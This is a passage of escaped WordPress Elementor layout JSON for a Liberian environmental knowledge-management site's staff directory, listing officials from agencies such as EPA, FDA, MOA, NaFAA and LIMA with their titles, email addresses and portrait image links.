\\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"i